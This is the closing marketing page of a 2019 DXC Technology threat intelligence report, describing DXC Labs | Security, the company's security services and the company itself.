Learn more Thank you for reading the Threat Intelligence Report. Learn more about security trends and insights from DXC Labs | Security.

DXC Labs | Security

DXC Labs delivers thought leadership technology prototypes to enable enterprises to thrive in the digital age.

DXC Labs | Security brings together our world-class advisors to develop strategic and architectural insights to reduce digital risk. DXC’s Cyber Reference Architecture is at the heart of our research, providing clients with detailed guidance on methods to efficiently resolve the most challenging security problems. We help clients minimize risk while taking maximum advantage of the digital commons.

Learn more at www.dxc.technology/securitylabs


DXC in Security Recognized as a leader in security services, DXC Technology helps clients prevent potential attack pathways, reduce cyber risk, and improve threat detection and incident response. Our expert advisory services and 24x7 managed security services are backed by 3,500+ experts and a global network of security operations centers.

DXC provides solutions tailored to our clients’ diverse security needs, with areas of specialization in Intelligent Security Operations, Identity and Access Management, Data Protection and Privacy, Security Risk Management, and Infrastructure and Endpoint Security. Learn how DXC can help protect your enterprise in the midst of large-scale digital change. Visit www.dxc.technology/security.

Stay current on the latest threats www.dxc.technology/threats

About DXC Technology As the world’s leading independent, end-to-end IT services company, DXC Technology (NYSE: DXC) leads digital transformations for clients by modernizing and integrating their mainstream IT, and by deploying digital solutions at scale to produce better business outcomes. The company’s technology independence, global talent, and extensive partner network enable 6,000 private and public-sector clients in 70 countries to thrive on change. DXC is a recognized leader in corporate responsibility. For more information, visit www.dxc.technology and explore thrive.dxc.technology, DXC’s digital destination for changemakers and innovators.

© Copyright 2019 DXC Technology Company. All rights reserved.